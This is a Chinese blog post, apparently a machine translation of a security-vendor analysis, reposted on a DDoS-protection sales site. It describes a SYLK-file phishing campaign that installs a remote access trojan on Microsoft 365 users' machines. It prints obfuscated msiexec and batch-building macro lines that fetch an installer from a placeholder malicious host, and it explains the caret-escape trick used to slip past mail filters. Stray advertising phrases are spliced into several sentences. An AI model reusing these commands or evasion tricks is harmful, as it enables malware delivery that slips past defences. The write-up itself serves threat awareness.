来自 CC防护 2022-04-09 02:50 的文章

香港高防服务器_高防云服务器_解决方案

香港高防服务器_高防云服务器_解决方案

随着"正常"的定义日新月异,持续的流行病迫使安全专业人员重新评估新的工作模式,以及如何防止攻击者以最终用户为目标。阿尔伯特·爱因斯坦曾经说过,"在每一次危机中都有巨大的机会",这一观点为网络犯罪分子在新冠病毒-19时代的运作奠定了基础。

永远不要浪费机会,网络犯罪分子每天都在部署新的攻击。Microsoft最近受到一种新的SYLKIN攻击的影响,该攻击绕过了Microsoft 365默认安全性(EOP)和Microsoft高级安全性(ATP)。在撰写本文时,Microsoft 365仍然易受攻击,并且该攻击仍被广泛用于针对Microsoft 365客户的攻击。

最近,Avanan的安全分析师发现,针对Microsoft 365客户的攻击中,SLK文件的使用量显著增加。在这些攻击中,黑客发送一封带有.slk附件的电子邮件,其中包含恶意宏(msiexec脚本)以下载并安装远程访问特洛伊木马。

另一方面,这是一种非常复杂的攻击,具有几种专门设计用于绕过Microsoft 365.Gmail客户的混淆方法,不会受到这种攻击-谷歌已经在收到的电子邮件中屏蔽了这些SLK文件,并且无法将这些SLK文件作为附件从Gmail帐户发送出去。

同样,SLK文件很少见,所以如果你在收件箱中收到了一个,您很有可能成为最新的远程访问特洛伊木马恶意软件的目标,该恶意软件已"升级"以绕过Microsoft ATP。攻击方法本身已经有大量的文档记录,所以我只简单地解释一下。重点将放在这样一个众所周知的攻击如何绕过Office 365过滤器,包括Microsoft ATP。

攻击专门针对Microsoft 365帐户,直到最近,ddos防御购买,仅限于少数组织。

攻击电子邮件高度定制,使用只能手动找到和编写的信息和语言。这些信息似乎来自合作伙伴或客户,他们使用的主题与组织和个人高度相关。例如,给制造商的电子邮件将讨论零件规格,给技术公司的电子邮件将要求更改大型电子产品订单,或者给政府部门的电子邮件将讨论法律问题。主题、内容甚至附件都是根据目标的名称和组织进行定制的。没有两个人是一样的。它们的共同点是,这些信息真实而引人注目,足以说服用户点击所附的SLK文件。

所谓的"符号链接"(SLK)文件是微软的可读文件,基于文本的电子表格格式,上一次更新是在1986年《达拉斯》停播时。当时XLS文件是专有的,在2007年引入XLSX之前,SLK是一种开放格式。对于最终用户来说,SLK文件看起来像Excel文档,但对于攻击者来说,这是一种绕过Microsoft 365安全性的简单方法,即使是受Microsoft ATP保护的帐户。

SYLK攻击的最新版本包括一个SLK文件,该文件带有一个模糊的宏,用于在Windows计算机上运行命令:

msiexec/i /q

这将以安静模式运行Windows Installer(msiexec),以安装他们决定在其主机上托管的任何MSI软件包地点。在本次活动中,它是现成NetSupport远程控制应用程序的黑客版本,允许攻击者完全控制桌面。

由于Windows"受保护视图"不适用于从Internet或电子邮件下载的SLK文件,Excel不会以只读模式打开它们。

打开SLK文件时,最终用户没有看到此消息:

SLK攻击方法的第一个版本出现在2018年,免费的cc防御,最终被Microsoft ATP阻止。然而,这项新活动包括一些专门设计用于绕过Microsoft ATP的模糊处理技术。

这些方法是特定于ATP的。同样,Gmail会阻止这些文件,事实上,这使得无法从Gmail帐户发送。

攻击者利用Microsoft电子邮件基础设施中的一系列盲点,从数千个一次性Hotmail帐户发送此攻击,电子邮件地址格式为"randomwords1982@hotmail.com,"每个人一次只发送一小部分或多条消息。

Hotmail对许多攻击者的一个重要好处是端到端使用相同的安全过滤器。如果攻击者能够附加并发送文件,则很可能会使其通过整个Microsoft安全基础架构。如果其中一个帐户被标记,Microsoft将禁用该帐户,通知攻击者其邮件正在下游被捕获。

虽然大多数著名的匿名电子邮件发送引擎都应该受到垃圾邮件和网络钓鱼的不良声誉,但Hotmail用户从Microsoft自身的声誉中获益。由于该服务与自己的Outlook应用程序合并,Microsoft似乎授予他们比外部发件人更高的信任级别。

攻击者利用ATP筛选器无法以与Windows命令行相同的方式解释文本这一事实。ATP通常能够识别强大且潜在恶意的msiexec命令,但攻击者插入命令行转义字符"^"以混淆脚本。

msiexec/i /当被高级威胁保护过滤器读取时,q

变为

M^s^ie^xec/ih^tt^p^:^/^/恶意网站/com/install.php^/q

,msiexec命令变得不可读,指示灯"http://"被遮挡。

当被桌面命令行读取时,转义字符"消失",就像它们从未出现一样运行。这只是多年来困扰ATP的零字体方法的命令行版本。

ATP不需要看到"http://"来识别web链接,通常会捕获任何格式为"恶意网站.com"的文本,以隐藏链接,攻击者将其分为两个单独的命令。

第一个宏命令使用URL的前半部分创建一个批处理文件。

Set/p=""M^s^ie^xec/ih^tt^p^:^/^/malistic sit"">JbfoT.bat

第二个宏命令添加URL的其余部分,然后运行批处理文件。

Set/p=""e.com/install.php^/q"">>JbfoT.batJbfoT.bat

几秒钟内,恶意SLK文件运行了两个简单的命令来创建恶意安装脚本,并开始安装攻击者决定托管的任何软件。